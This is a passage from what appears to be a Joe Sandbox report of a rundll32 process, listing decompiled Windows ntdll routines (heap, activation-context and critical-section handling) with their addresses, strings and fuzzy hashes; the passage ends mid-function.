                                                                                            • Instruction Fuzzy Hash: C03192B16083059FD314DF68C88096BBBE8FB96754F004A2EF59483250F639FD05DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E045E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0461BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0461A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0461A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L045F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                            0x045e1b8f
                                                                                            0x045e1b9a
                                                                                            0x045e1b9c
                                                                                            0x045e1b9e
                                                                                            0x045e1ba3
                                                                                            0x04637010
                                                                                            0x04637010
                                                                                            0x00000000
                                                                                            0x045e1ba9
                                                                                            0x045e1ba9
                                                                                            0x045e1bae
                                                                                            0x00000000
                                                                                            0x045e1bc5
                                                                                            0x045e1bca
                                                                                            0x045e1bcf
                                                                                            0x045e1bd0
                                                                                            0x045e1bd1
                                                                                            0x045e1bd2
                                                                                            0x045e1bd6
                                                                                            0x045e1bdc
                                                                                            0x045e1be0
                                                                                            0x04636ffc
                                                                                            0x04637000
                                                                                            0x00000000
                                                                                            0x04637006
                                                                                            0x04637009
                                                                                            0x04637009
                                                                                            0x045e1be6
                                                                                            0x045e1bec
                                                                                            0x045e1c0b
                                                                                            0x045e1c0b
                                                                                            0x045e1c0c
                                                                                            0x045e1c11
                                                                                            0x045e1c12
                                                                                            0x045e1c15
                                                                                            0x045e1c1b
                                                                                            0x045e1c1f
                                                                                            0x045e1c31
                                                                                            0x045e1c33
                                                                                            0x04637026
                                                                                            0x04637026
                                                                                            0x045e1c21
                                                                                            0x045e1c24
                                                                                            0x045e1c24
                                                                                            0x045e1bee
                                                                                            0x045e1bee
                                                                                            0x045e1bf2
                                                                                            0x045e1c3a
                                                                                            0x045e1bf4
                                                                                            0x045e1bf4
                                                                                            0x045e1c05
                                                                                            0x045e1c05
                                                                                            0x045e1c09
                                                                                            0x045e1c3e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e1c09
                                                                                            0x045e1bec
                                                                                            0x045e1be0
                                                                                            0x045e1bae
                                                                                            0x045e1c2e

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: WindowsExcludedProcs
                                                                                            • API String ID: 0-3583428290
                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction ID: 2c5d0f0d06cee882f38831fcc5c632bf50a28117a1cfd7525a68d120136aba43
                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction Fuzzy Hash: 762128B6601928ABDB259E97C940F6B77ADBF41715F054465F908CB200E630FD00E7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                            0x045ff71d
                                                                                            0x045ff722
                                                                                            0x045ff726
                                                                                            0x04644770
                                                                                            0x045ff765
                                                                                            0x045ff769
                                                                                            0x045ff769
                                                                                            0x045ff732
                                                                                            0x0464477a
                                                                                            0x00000000
                                                                                            0x0464477a
                                                                                            0x045ff738
                                                                                            0x045ff73a
                                                                                            0x045ff73c
                                                                                            0x045ff73f
                                                                                            0x045ff746
                                                                                            0x045ff778
                                                                                            0x045ff7a9
                                                                                            0x045ff7a9
                                                                                            0x045ff754
                                                                                            0x045ff75a
                                                                                            0x045ff75d
                                                                                            0x045ff75f
                                                                                            0x045ff761
                                                                                            0x045ff76f
                                                                                            0x045ff771
                                                                                            0x045ff771
                                                                                            0x045ff76f
                                                                                            0x045ff763
                                                                                            0x00000000
                                                                                            0x045ff763
                                                                                            0x045ff77d
                                                                                            0x045ff7a3
                                                                                            0x045ff7a5
                                                                                            0x00000000
                                                                                            0x045ff7a5
                                                                                            0x045ff77f
                                                                                            0x045ff782
                                                                                            0x045ff784
                                                                                            0x045ff786
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ff788
                                                                                            0x045ff748
                                                                                            0x045ff74d
                                                                                            0x045ff78d
                                                                                            0x045ff793
                                                                                            0x045ff7b7
                                                                                            0x045ff7bc
                                                                                            0x00000000
                                                                                            0x045ff7bc
                                                                                            0x045ff798
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ff79d
                                                                                            0x045ff7b0
                                                                                            0x00000000
                                                                                            0x045ff7b0
                                                                                            0x045ff79f
                                                                                            0x00000000
                                                                                            0x045ff74f
                                                                                            0x045ff74f
                                                                                            0x00000000
                                                                                            0x045ff74f

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Actx
                                                                                            • API String ID: 0-89312691
                                                                                            • Opcode ID: bbdee6affc32c9e90b0726167452ec714db17973ca3aa4d0ed9e3f7c398055c1
                                                                                            • Instruction ID: e28b5edf158f9af3b3c23d04c4b77d5f33fb9083aa6c1852f708e58ca3f97142
                                                                                            • Opcode Fuzzy Hash: bbdee6affc32c9e90b0726167452ec714db17973ca3aa4d0ed9e3f7c398055c1
                                                                                            • Instruction Fuzzy Hash: 1D119637306E428BEB244D1D9C90736F395FB95724F24492BD661DBB91EA70F841B382
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04688DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 71%
                                                                                            			E04688DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x46b0d50);
				E0462D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04665720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0462DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0462DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0462D130(_t34, _t39, _t40);
			}





                                                                                            0x04688df1
                                                                                            0x04688df1
                                                                                            0x04688df1
                                                                                            0x04688df1
                                                                                            0x04688df1
                                                                                            0x04688df1
                                                                                            0x04688df3
                                                                                            0x04688df8
                                                                                            0x04688dfd
                                                                                            0x04688e00
                                                                                            0x04688e0e
                                                                                            0x04688e2a
                                                                                            0x04688e36
                                                                                            0x04688e38
                                                                                            0x04688e3c
                                                                                            0x04688e46
                                                                                            0x04688e46
                                                                                            0x04688e36
                                                                                            0x04688e50
                                                                                            0x04688e56
                                                                                            0x04688e59
                                                                                            0x04688e5c
                                                                                            0x04688e60
                                                                                            0x04688e67
                                                                                            0x04688e6d
                                                                                            0x04688e73
                                                                                            0x04688e74
                                                                                            0x04688eb1
                                                                                            0x04688ebd

                                                                                            Strings
                                                                                            • Critical error detected %lx, xrefs: 04688E21
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Critical error detected %lx
                                                                                            • API String ID: 0-802127002
                                                                                            • Opcode ID: 4796e974b8edd926ce9db4014e178bf2eececb8d5d633094a03664941e0fea21
                                                                                            • Instruction ID: b2ca3c64963d49acee2c2a4fc295c3ee0cbf64cb9dc4f8320032a7e7cbb38216
                                                                                            • Opcode Fuzzy Hash: 4796e974b8edd926ce9db4014e178bf2eececb8d5d633094a03664941e0fea21
                                                                                            • Instruction Fuzzy Hash: 76118B71D00748EBEF24EFA495097DDBBB0BB14314F20425ED469AB382E3346602CF18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0466FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0466FF60
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                            • API String ID: 0-1911121157
                                                                                            • Opcode ID: 9a9fc449ba5f79326b78e5363d7bec4d37b1e1105f8412fa8557d69174cb2dc2
                                                                                            • Instruction ID: 296b2020b876139e57f257974939071f71936c7eefd47d1d4592afab9f9f5b75
                                                                                            • Opcode Fuzzy Hash: 9a9fc449ba5f79326b78e5363d7bec4d37b1e1105f8412fa8557d69174cb2dc2
                                                                                            • Instruction Fuzzy Hash: 6B110071910584FFEB16EF50D949FA8BBB2FF08708F148448E10A6B6A1E739B980CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 88%
                                                                                            			E046A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x46b1178);
				E0462D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E046A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0461D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E046A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x46c60e8;
								if( *0x46c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x46c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04619710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04616DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0461F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0461F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0461F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0461FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0461FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
